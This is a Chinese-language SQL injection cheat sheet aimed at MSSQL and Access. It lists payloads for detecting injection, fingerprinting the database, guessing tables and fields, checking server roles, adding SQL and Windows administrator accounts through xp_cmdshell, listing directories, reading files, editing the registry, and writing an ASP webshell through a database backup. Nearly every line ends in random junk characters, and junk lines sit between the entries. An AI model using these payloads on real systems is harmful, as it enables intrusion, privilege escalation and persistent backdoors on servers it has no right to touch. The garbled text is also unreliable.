1.判断是否有注入;and 1=1 ;and 1=2 h.?[1hT4R
2.初步判断是否是mssql ;and user>0 Q|ik\
rM?D7a{q
3.注入参数是字符'and [查询条件] and ''=' mSj[t
^mJvB[ u|
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /yykOvUO
3LXpe8$lJ
5.判断数据库系统 Ro<!n>H
u^]yz&9V
;and (select count(*) from sysobjects)>0 mssql ~zm/n,Epb
hf?^#=k^
;and (select count(*) from msysobjects)>0 access ;! 9_5Ar%
`S~u4+y]
3P6'*pZ
x.^vWka(
6.猜数据库 ;and (select Count(*) from [数据库名])>0
KbUX(9+B
@wFm])}0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 zHdp'J"
D46|)-
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 d|o"QYX
pbzbh&Y
9.(1)猜字段的ascii值(access) NDg]s2T
DY07?x7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 4z*_,@OA
Dq?2mXOqD
(2)猜字段的ascii值(mssql) WuNu}Ibl}m
h7y*2:l6
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 IWWFl6$-
YpKai3 B
10.测试权限结构(mssql) :5*<QJuI#A
6=g7|}
vJCL
m/}*
[.Y=~)7FB
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ho20>vw#
=
]@xXVf/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- GawO>7w8
q@sH@-z4]
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- IY19G U9
1(?J>{-lw
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- @i68%6H`?
MMAC,4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Yq
Fzbm{\
BdKtpje
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \k,bz0
kC
k-
;and 1=(select IS_MEMBER('db_owner'));-- {S}@P~H=
]Bsq?e^
GMNb;D(>K
KC(Ug4
11.添加mssql和系统的帐户 BJE <~"
VM!x)i9z
;exec master.dbo.sp_addlogin username;-- u l%bo%&~
;exec master.dbo.sp_password null,username,password;-- **q/'K
LC7LO
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- d0=nAZZ
5oKc=iX_3
;exec master.dbo.xp_cmdshell 'net user username password @Y,F&8a$
UBVb#FNF
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- J50 ~B3bj`
_tk5?9Ykn
;exec master.dbo.xp_cmdshell 'net user username password /add';-- +B m+Pj>
@ 7?_Yw
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- )1vojp
4Za
oW[,EW+u
&rl>{Uvq
$Y`aS^IW
12.(1)遍历目录 U.aa iX7
*X\c
$=*
;create table dirs(paths varchar(100), id int) W.|6$hRl)
/wTf&_"mTL
;insert dirs exec master.dbo.xp_dirtree 'c:\' [86'/:L\2
nsT|,O
;and (select top 1 paths from dirs)>0 752wK|o0|;
c-.>C)
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 3CE8+PnT
4I-p/&Q
^kr)U8
W/>?1+r.Z
(2)遍历目录 iy]}1((hR
$3TTHS o
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- i .N1Cvp&
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 !_9$[Oq~
h)rf6*hw
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
i6d$/yP"
lX*;KHT )
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 HD{`w1vcN
k&/)g3(N(
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 IDh`0/i]
Zir`IQ$
SR&
mHI-f0
Gme$FWa
13.mssql中的存储过程 H/k W
:k
@vYmkF`
xp_regenumvalues 注册表根键, 子键 ~TH5>``;gF
ak) -OL1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 mi<D
bnou
$NT9LtT@K
xp_regread 根键,子键,键值名 ~5NGDT#L*
}4]<P
;exec xp_regread 0f%:OU5Y
S;Z3v)E-f
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 o0G`Xn
ig}e@]
xp_regwrite 根键,子键, 值名, 值类型, 值 9S%gVNxn
-FN6sNvIh
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ox_h9=$-
:bRR(sP
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 5ek%d
g&3#22z
xp_regdeletevalue 根键,子键,值名 IZ0$=aB7
/iy*3P,`
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 `4.sy +2
Om2X>/V%C
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 OgN1{vRFx
L4pjh&+8
=O#AOw`
rz}l<t~H
14.mssql的backup创建webshell 0BB@E(*
rm=~^eB
use model :{s%=\k {d
{!1n5a3" 1
create table cmd(str image); g!p_c
G;HlII9x[
insert into cmd(str) values (''); 2c~?UK[1
^i+z_%V
backup database model to disk='c:\l.asp'; g1wI/
kbYg4t]FH
O;0<^M/0G
y)/$ge_U
15.mssql内置函数 };m7FO
'?G[T28
;and (select @@version)>0 获得Windows的版本号 LAY)">*49H
Z!-<rajl
;and user_name()='dbo' 判断当前系统的连接用户是不是sa )fMX!#KP
|5IY`;+9
;and (select user_name())>0 爆当前系统的连接用户 N9=r#![>,
dA)4(0o8fD
;and (select db_name())>0 得到当前连接的数据库 <`xRqe:&9
]X:
rby$
jqGo-C~
;2Ad])
16.简洁的webshell JXY!c\,
nG^M 2)(8
use model @CaD8%j{
sK 1m9
create table cmd(str image); @b!R2Yq
c,+(FQ9
insert into cmd(str) values (''); a4jnu:e
aC,vh1")F
backup database model to disk='g:\wwwtest\l.asp';